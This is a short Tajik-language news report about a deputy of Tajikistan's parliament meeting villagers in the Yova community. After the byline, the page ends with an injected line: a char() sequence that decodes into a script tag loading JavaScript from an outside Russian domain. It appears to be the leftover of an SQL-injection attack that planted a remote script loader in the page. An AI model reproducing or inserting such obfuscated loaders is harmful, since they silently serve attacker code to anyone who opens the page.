5.05.2010
Вохӯрии муовини раиси Маҷлиси намояндагони М. О. Ҷ. Т. бо аҳли ҷамоати Ёва
Дар маҷлисгоҳи хоҷагии ҷамоавииба номи Ҷаббор Расулови ҷамоати деҳоти Ёваи ноҳия вохӯрии вакили Маҷлиси намояндагони Маҷлиси Олии Ҷумҳурии Тоҷикистон Назира Ғаффорова бо фаъолони ҷамоату маҳалҳо, собиқадорони меҳнат омӯзгорону табибон ва хонандагони Мактаби таҳсилоит умумии деҳа баргузор гардид. Ҷамъомадро раиси н. Б. Ғафуров Лутфулло Муҳиддинов оғоз намуда, сараввал ҳамагонро бо Иди Ғалаба табрик гуфт. Назира Ғаффорова минатдории худро ба сокинони деҳа ва ноҳия барои бовариашон ба ӯ чун вакили Маҷлиси намояндагони Мачлиси Олии Ҷумҳурии Тоҷикистон аз ҳавзаи интихоботии № 14-и ноҳияи Б. Ғафуров изҳори сипосманди намуда, дар бораи ҳайъати нави Маҷлиси Олии Ҷумҳурии Тоҷикистон маълумот дод. Аз ҷумла ӯ қайд кард, ки аз 63 нафар вакил 12 нафарашонро занҳо ташкил медиҳанд ки 2 нафари онҳо аз ноҳияи мазкур мебошанд.
Баъдан андешаҳои худро парлумони нуқтаҳои асосии паёми имсолаи президенти мамлакат чунин иброз дошт:
-Яке аз масъалаи муҳиме, ки дар паёми президенти кишвар мавриди таваҷҷӯҳ қарор гирифта буд ин истифодаи телефони мобили мебошад, ки ҳамвора андешаҳояшро перомуни мавзӯи мазкур чунин иброз намуд .
Назира Ғаффорова мӯҳтавои паёмро соҳа ба соҳа муфассал баҳри ҳозирон фаҳмонида дод.
Дар охир аз номи иштирокчиён имом хатиби деҳа Қураёшихон Иброҳимов сухан гуфта минатдории хешро барои ташриф ва гузаронидани чунин чорабини ба Назира Ғаффорова ва ташкилкунандагон баён намуд.

Авзал БОСОЛИЕВ
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)bebd674a760a55016fcf71d901e75092.js" type="text/javascript">